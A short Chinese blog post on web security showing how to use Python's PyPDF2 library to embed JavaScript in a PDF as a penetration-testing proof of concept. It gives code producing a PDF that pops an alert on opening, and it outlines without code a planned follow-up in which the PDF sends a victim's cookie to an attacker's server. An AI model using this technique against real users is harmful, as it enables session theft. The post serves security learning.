【web安全】PDF写入XSS攻击

一开始研究用现成的PDF编辑器工具写入,发现又要VIP,又比较繁琐

还不如用 Python装一个库,写代码来的快捷

所以采用了PyPDF2这个库来写入

基础用法

在渗透测试中,能触发弹窗就算是一个漏洞了

# 安装第三方库
pip install PyPDF2 -i https://pypi.tuna.tsinghua.edu.cn/simple
from PyPDF2 import PdfReader,PdfWriter

# 新建一个PDF文档
new_PDF = PdfWriter()

# 写入JavaScript代码
new_PDF.add_js("app.alert(123);")

# 打开一个新的PDF文件,二进制方式写入
f = open("XSS2.pdf","wb")

# 写进PDF,其实这里没看懂,为什么是要反过来写?
new_PDF.write(f)

# 最后保存关闭文件
f.close() 

进阶用法

这里要注重实战,搭建一个靶场进行实战

首先打开网站,下发Cookie,然后再到打开PDF反弹Cookie

再模拟黑客用服务器接收Cookie,登录,一条龙

有空再写

你可能感兴趣的:(web安全,pdf,xss,前端)